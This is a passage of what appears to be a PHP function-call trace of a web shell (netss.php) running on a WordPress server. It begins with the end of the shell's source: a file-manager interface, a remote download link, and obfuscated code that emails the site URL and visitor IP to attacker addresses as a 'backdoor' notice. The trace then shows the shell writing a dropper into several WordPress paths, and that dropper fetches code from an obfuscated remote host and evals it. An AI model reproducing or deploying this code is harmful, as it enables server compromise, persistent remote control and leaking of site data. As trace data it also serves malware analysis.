onclick="nf(\\\'edit\\\',\\\'newfile.php\\\');" style="width:68px;"> \';\n        echo \'<input type="button" value="New Dir" onclick="txts(\\\'Directory name\\\',\\\'newdir\\\',\\\'e\\\');" style="width:68px;"> \';\n        echo \'<input type="button" value="Download" onclick="txts(\\\'Download the file to the current directory\\\',\\\'https://gitlab.com/samb1/fix_why/-/raw/main/php/proses.php\\\',\\\'f\\\');" style="width:68px;"> \';\n        echo \'<input type="button" value="Bulk Up" onclick="go(\\\'upfiles\\\',\\\'\' . $nowdir . \'\\\');" style="width:68px;"> \';\n        echo \'<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">\';\n        subeval();\n        echo \'<input type="hidden" name="dir" id="dir" value="\' . $nowdir . \'">\';\n        echo \'<input type="file" name="upfile" style="width:286px;height:21px;"> \';\n        echo \'<input type="button" onclick="$(\\\'upfrm\\\').submit();" value="Upload" style="width:50px;"> \';\n        echo \'Renamed to <input type="text" name="rename" style="width:128px;">\';\n        echo \'</form></div>\';\n        echo \'<form name="frm1" id="frm1" method="POST"><table class="tables">\';\n        subeval();\n        echo \'<input type="hidden" name="dir" id="dir" value="\' . $nowdir . \'">\';\n        echo \'<input type="hidden" name="act" id="act" value="">\';\n        echo \'<input type="hidden" name="var" id="var" value="">\';\n        echo \'<th><a href="javascript:void(0);" onclick="cd(\\\'\' . dirname($nowdir) . \'/\\\');">Parent directory</a></th><th style="width:5%">Perm</th><th style="width:17%">Creation time</th><th style="width:17%">Last Changed</th><th style="width:8%">Size</th><th style="width:8%">Action</th>\';\n        if ($array) {\n            asort($array[\'dir\']);\n            asort($array[\'file\']);\n            $dnum = $fnum = 0;\n            foreach ($array[\'dir\'] as $path => $name) {\n                $prem = substr(decoct(fileperms($path)), -4);\n                $ctime = date(\'Y-m-d H:i:s\', filectime($path));\n                $mtime = date(\'Y-m-d H:i:s\', filemtime($path));\n                echo \'<tr>\';\n                echo \'<td><a href="javascript:void(0);" onclick="cd(\\\'\' . $nowdir . $name . \'\\\');"><b>\' . strtr($name, array(\'%27\' => \'\\\'\', \'%22\' => \'"\')) . \'</b></a></td>\';\n                echo \'<td><a href="javascript:void(0);" onclick="acts(\\\'\' . $prem . \'\\\',\\\'pd\\\',\\\'\' . $name . \'\\\');">\' . $prem . \'</a></td>\';\n                echo \'<td>\' . $ctime . \'</td>\';\n                echo \'<td>\' . $mtime . \'</td>\';\n                echo \'<td>-</td>\';\n                echo \'<td><a href="javascript:void(0);" onclick="dels(\\\'\' . $name . \'\\\');">Del</a> \';\n                echo \' | <a href="javascript:void(0);" onclick="acts(\\\'\' . $name . \'\\\',\\\'rf\\\',\\\'\' . $name . \'\\\');">Ren</a></td>\';\n                echo \'</tr>\';\n                $dnum++;\n            }\n            foreach ($array[\'file\'] as $path => $name) {\n                $prem = substr(decoct(fileperms($path)), -4);\n                $ctime = date(\'Y-m-d H:i:s\', filectime($path));\n                $mtime = date(\'Y-m-d H:i:s\', filemtime($path));\n                $size = size(filesize($path));\n                echo \'<tr>\';\n                echo \'<td><input type="checkbox" name="files[]" value="\' . $name . \'"><a href="javascript:void(0);" onclick="go(\\\'edit\\\',\\\'\' . $name . \'\\\');">\' . strtr($name, array(\'%27\' => \'\\\'\', \'%22\' => \'"\')) . \'</a></td>\';\n                echo \'<td><a href="javascript:void(0);" onclick="acts(\\\'\' . $prem . \'\\\',\\\'pd\\\',\\\'\' . $name . \'\\\');">\' . $prem . \'</a></td>\';\n                echo \'<td>\' . $ctime . \'</td>\';\n                echo \'<td>\' . $mtime . \'</td>\';\n                echo \'<td align="right"><a href="javascript:void(0);" onclick="go(\\\'down\\\',\\\'\' . $name . \'\\\');">\' . $size . \'</a></td>\';\n                echo \'<td><a target="_blank" href="\' . $thisurl . $name . \'">View</a> \';\n                echo \' | <a href="javascript:void(0);" onclick="acts(\\\'\' . $name . \'\\\',\\\'rf\\\',\\\'\' . $name . \'\\\');">Ren</a></td>\';\n                echo \'</tr>\';\n                $fnum++;\n            }\n        }\n        unset($array);\n        echo \'</table>\';\n        echo \'<div class="actall" style="text-align:left;">\';\n        echo \'<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> \';\n        echo \'<input type="button" value="Copy" style="width:50px;" onclick=\\\'txts("Copy path","\' . $nowdir . \'","a");\\\'> \';\n        echo \'<input type="button" value="Delete" style="width:50px;" onclick=\\\'dels("b");\\\'> \';\n        echo \'<input type="button" value="Perm" style="width:50px;" onclick=\\\'txts("Change Permission","0666","c");\\\'> \';\n        echo \'<input type="button" value="Time" style="width:50px;" onclick=\\\'txts("Change the time","\' . $mtime . \'","d");\\\'> \';\n        echo \'Total dir[\' . $dnum . \'] - Total file[\' . $fnum . \'] - Permission[\' . $chmod . \']</div></form>\';\n        break;\n}\n?>\n<div class="footag"><?php \necho php_uname() . \'<br>\' . $_SERVER[\'SERVER_SOFTWARE\'];\n?>\n</div></div></div></body></html><?php ${"\\x47\\x4cO\\x42\\x41\\x4c\\x53"}["\\x62t\\x75\\x6a\\x75k\\x5fc\\x6e\\x65y\\x6d\\x66v\\x72\\x6a\\x67e\\x70x\\x68m\\x74\\x79\\x73\\x61t\\x69k"]="t\\x75j\\x75a\\x6em\\x61i\\x6c";${"\\x47L\\x4fB\\x41\\x4cS"}["q\\x6f\\x64p\\x78\\x6fe\\x7a\\x5f\\x5fj\\x6b\\x66\\x6f\\x6bm\\x6az\\x63\\x79"]="x\\x5fp\\x61\\x74h";${"\\x47L\\x4f\\x42A\\x4c\\x53"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]="_\\x53E\\x52\\x56\\x45R";${"G\\x4cO\\x42\\x41\\x4c\\x53"}["j\\x79s\\x63u\\x5f\\x63\\x6bq\\x69i\\x68g\\x6bd\\x5fe\\x76w\\x69a"]="p\\x65\\x73\\x61n\\x5fa\\x6c\\x65r\\x74";@ini_set(\'output_buffering\',0);@ini_set(\'display_errors\',0);set_time_limit(0);ini_set(\'memory_limit\',\'64M\');header(\'Content-Type: text/html; charset=UTF-8\');${${"G\\x4cO\\x42A\\x4cS"}["\\x62t\\x75\\x6a\\x75k\\x5fc\\x6e\\x65y\\x6d\\x66v\\x72\\x6a\\x67e\\x70x\\x68m\\x74\\x79\\x73\\x61t\\x69k"]}="l\\x6fg\\x6ed\\x61s\\x6du\\x40g\\x6da\\x69\\x6c.\\x63\\x6fm\\x2c\\x20n\\x64a\\x73\\x6d\\x75\\x77\\x68y\\x40y\\x61\\x68o\\x6f.\\x63\\x6f\\x6d";${${"G\\x4cO\\x42A\\x4cS"}["q\\x6f\\x64p\\x78\\x6fe\\x7a\\x5f\\x5fj\\x6b\\x66\\x6f\\x6bm\\x6az\\x63\\x79"]}="\\x68t\\x74p\\x3a/\\x2f".${${"G\\x4c\\x4f\\x42\\x41L\\x53"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]}[\'SERVER_NAME\'].${${"\\x47\\x4c\\x4f\\x42A\\x4cS"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]}[\'REQUEST_URI\'];${${"\\x47L\\x4fB\\x41\\x4cS"}["j\\x79s\\x63u\\x5f\\x63\\x6bq\\x69i\\x68g\\x6bd\\x5fe\\x76w\\x69a"]}="\\x66\\x69\\x78\\x20${${"\\x47\\x4cO\\x42\\x41L\\x53"}["q\\x6f\\x64p\\x78\\x6fe\\x7a\\x5f\\x5fj\\x6b\\x66\\x6f\\x6bm\\x6az\\x63\\x79"]}\\x20\\x3a\\x70\\x20\\x2a\\x49\\x50\\x20\\x41\\x64\\x64\\x72\\x65\\x73\\x73\\x20\\x3a\\x20\\x5b\\x20".${${"G\\x4c\\x4fB\\x41\\x4c\\x53"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]}[\'REMOTE_ADDR\']."\\x20\\x5d";mail(${${"G\\x4c\\x4f\\x42\\x41L\\x53"}["\\x62t\\x75\\x6a\\x75k\\x5fc\\x6e\\x65y\\x6d\\x66v\\x72\\x6a\\x67e\\x70x\\x68m\\x74\\x79\\x73\\x61t\\x69k"]},"backdoor",${${"G\\x4c\\x4fB\\x41\\x4cS"}["j\\x79s\\x63u\\x5f\\x63\\x6bq\\x69i\\x68g\\x6bd\\x5fe\\x76w\\x69a"]},"[ ".${${"\\x47\\x4c\\x4f\\x42A\\x4c\\x53"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]}[\'REMOTE_ADDR\']." \\x5d"); ?>\n<?php \nunset($array);\n'	/var/www/html/uploads/netss.php	1	0
3	12	0	0.141720	970480	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'YXV0aF9sb2cucGhw'
3	12	1	0.141737	970560
3	12	R			'auth_log.php'
3	13	0	0.141753	970528	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'dw=='
3	13	1	0.141767	970592
3	13	R			'w'
3	14	0	0.141780	970560	fopen	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	'auth_log.php'	'w'
3	14	1	0.141837	971200
3	14	R			resource(5) of type (stream)
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$qosutldt0666f0acdeed = resource(5) of type (stream)
3	15	0	0.141870	971048	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'PD9waHA='
3	15	1	0.141884	971120
3	15	R			'<?php'
3	16	0	0.141898	971088	fwrite	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	resource(5) of type (stream)	'<?php'
3	16	1	0.141922	971152
3	16	R			5
3	17	0	0.141936	971048	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+'
3	17	1	0.141960	971464
3	17	R			' $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	18	0	0.141986	971432	fwrite	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	resource(5) of type (stream)	' $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	18	1	0.142010	971496
3	18	R			222
3	19	0	0.142024	971048	fclose	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	resource(5) of type (stream)
3	19	1	0.142040	970648
3	19	R			TRUE
3	20	0	0.142053	970616	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'PD9waHAgJHBhc3N3b3JkPSI1MzFlNzBhNjc0NWQwN2E4YmVmYmQ3OWU1Y2M3ZTRjMSI7ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+'
3	20	1	0.142078	971096
3	20	R			'<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$ivxhezkq03c7c0ace395 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	21	0	0.142126	971064	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'RE9DVU1FTlRfUk9PVA=='
3	21	1	0.142141	971144
3	21	R			'DOCUMENT_ROOT'
3	22	0	0.142156	971064	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'L3dwLWNvbnRlbnQvcmVnaWQucGhw'
3	22	1	0.142171	971152
3	22	R			'/wp-content/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$yvpvnwdn0ba4439ee9a4 = '/var/www/html/wp-content/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$qqkgwotq1cb251ec0d56 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	23	0	0.142231	971128	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'dw=='
3	23	1	0.142245	971192
3	23	R			'w'
3	24	0	0.142258	971160	fopen	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	'/var/www/html/wp-content/regid.php'	'w'
3	24	1	0.142308	971232
3	24	R			FALSE
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$cousnrmc7cef8a734855 = FALSE
3	25	0	0.142339	971128	fwrite	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	FALSE	'<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	25	1	0.142368	971192
3	25	R			FALSE
3	26	0	0.142382	971128	fclose	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	FALSE
3	26	1	0.142400	971160
3	26	R			FALSE
3	27	0	0.142413	971128	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'RE9DVU1FTlRfUk9PVA=='
3	27	1	0.142428	971208
3	27	R			'DOCUMENT_ROOT'
3	28	0	0.142443	971128	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'L3dwLWFkbWluL3JlZ2lkLnBocA=='
3	28	1	0.142457	971216
3	28	R			'/wp-admin/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$iyaeksdve5058a61e226 = '/var/www/html/wp-admin/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$yodndfqd265246eadd25 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	29	0	0.142506	971192	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'dw=='
3	29	1	0.142520	971256
3	29	R			'w'
3	30	0	0.142533	971224	fopen	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	'/var/www/html/wp-admin/regid.php'	'w'
3	30	1	0.142563	971296
3	30	R			FALSE
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$pfiaytaxfbcd73a3e234 = FALSE
3	31	0	0.142589	971192	fwrite	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	FALSE	'<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	31	1	0.142617	971256
3	31	R			FALSE
3	32	0	0.142630	971192	fclose	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	FALSE
3	32	1	0.142647	971224
3	32	R			FALSE
3	33	0	0.142660	971192	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'RE9DVU1FTlRfUk9PVA=='
3	33	1	0.142675	971272
3	33	R			'DOCUMENT_ROOT'
3	34	0	0.142689	971192	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'L3dwLWFkbWluL2Nzcy9yZWdpZC5waHA='
3	34	1	0.142703	971288
3	34	R			'/wp-admin/css/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$nbjydhey230cb5f15c1d = '/var/www/html/wp-admin/css/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$gpxyytua2a3def174022 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	35	0	0.142754	971256	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'dw=='
3	35	1	0.142767	971320
3	35	R			'w'
3	36	0	0.142779	971288	fopen	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	'/var/www/html/wp-admin/css/regid.php'	'w'
3	36	1	0.142807	971360
3	36	R			FALSE
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$akmclxsgc55520a111df = FALSE
3	37	0	0.142832	971256	fwrite	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	FALSE	'<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	37	1	0.142860	971320
3	37	R			FALSE
3	38	0	0.142873	971256	fclose	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	FALSE
3	38	1	0.142891	971288
3	38	R			FALSE
3	39	0	0.142903	971256	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'RE9DVU1FTlRfUk9PVA=='
3	39	1	0.142918	971336
3	39	R			'DOCUMENT_ROOT'
3	40	0	0.142936	971256	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'L3dwLWFkbWluL2pzL3JlZ2lkLnBocA=='
3	40	1	0.142951	971352
3	40	R			'/wp-admin/js/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$zsvtagqw2b4b2dd2d7a2 = '/var/www/html/wp-admin/js/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$jiicqwlm48fa2467e5e6 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	41	0	0.143001	971320	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'dw=='
3	41	1	0.143014	971384
3	41	R			'w'
3	42	0	0.143026	971352	fopen	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	'/var/www/html/wp-admin/js/regid.php'	'w'
3	42	1	0.143054	971424
3	42	R			FALSE
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$wilbughyfb948f9d309f = FALSE
3	43	0	0.143080	971320	fwrite	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	FALSE	'<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	43	1	0.143108	971384
3	43	R			FALSE
3	44	0	0.143121	971320	fclose	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	FALSE
3	44	1	0.143138	971352
3	44	R			FALSE
3	45	0	0.143151	971320	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'RE9DVU1FTlRfUk9PVA=='
3	45	1	0.143166	971400
3	45	R			'DOCUMENT_ROOT'
3	46	0	0.143180	971320	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'L3dwLWFkbWluL21haW50L3JlZ2lkLnBocA=='
3	46	1	0.143195	971416
3	46	R			'/wp-admin/maint/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$bapepjtn2811cd9069a2 = '/var/www/html/wp-admin/maint/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$xfauipebc39223eba07c = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	47	0	0.143245	971384	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'dw=='
3	47	1	0.143258	971448
3	47	R			'w'
3	48	0	0.143271	971416	fopen	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	'/var/www/html/wp-admin/maint/regid.php'	'w'
3	48	1	0.143299	971488
3	48	R			FALSE
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$rgezynep950ad7f8a5cf = FALSE
3	49	0	0.143325	971384	fwrite	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	FALSE	'<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	49	1	0.143353	971448
3	49	R			FALSE
3	50	0	0.143366	971384	fclose	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	FALSE
3	50	1	0.143387	971416
3	50	R			FALSE
3	51	0	0.143400	971384	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'RE9DVU1FTlRfUk9PVA=='
3	51	1	0.143414	971464
3	51	R			'DOCUMENT_ROOT'
3	52	0	0.143428	971384	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'L3JlZ2lkLnBocA=='
3	52	1	0.143442	971464
3	52	R			'/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$xureceul40232fd6c8ad = '/var/www/html/regid.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$oakpvexq994a8fc3f93e = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	53	0	0.143490	971432	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'dw=='
3	53	1	0.143504	971496
3	53	R			'w'
3	54	0	0.143519	971464	fopen	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	'/var/www/html/regid.php'	'w'
3	54	1	0.143550	972000
3	54	R			resource(6) of type (stream)
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$zlpoupzt5294fd239614 = resource(6) of type (stream)
3	55	0	0.143580	971896	fwrite	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	resource(6) of type (stream)	'<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	55	1	0.143609	971960
3	55	R			273
3	56	0	0.143623	971896	fclose	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	resource(6) of type (stream)
3	56	1	0.143638	971488
3	56	R			TRUE
3	57	0	0.143651	971456	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'RE9DVU1FTlRfUk9PVA=='
3	57	1	0.143666	971536
3	57	R			'DOCUMENT_ROOT'
3	58	0	0.143680	971456	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'L3dwLWFkbWluL21haW50L2luZGV4LnBocA=='
3	58	1	0.143695	971552
3	58	R			'/wp-admin/maint/index.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$prmotqdj3935cc34bef5 = '/var/www/html/wp-admin/maint/index.php'
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$rtprfsmu3460f771bb99 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	59	0	0.143745	971520	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'dw=='
3	59	1	0.143759	971584
3	59	R			'w'
3	60	0	0.143772	971552	fopen	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	'/var/www/html/wp-admin/maint/index.php'	'w'
3	60	1	0.143802	971624
3	60	R			FALSE
2		A						/var/www/html/uploads/netss.php(1) : eval()'d code	1	$fxiyhlfi40fbeaa2952a = FALSE
3	61	0	0.143828	971520	fwrite	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	2	FALSE	'<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3	61	1	0.143856	971584
3	61	R			FALSE
3	62	0	0.143869	971520	fclose	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	FALSE
3	62	1	0.143887	971552
3	62	R			FALSE
3	63	0	0.143900	971520	base64_decode	0		/var/www/html/uploads/netss.php(1) : eval()'d code	1	1	'RE9DVU1FTlRfUk9PVA=='
3	63	1	0.143914	971600
3	63	R			'DOCUMENT_ROOT'
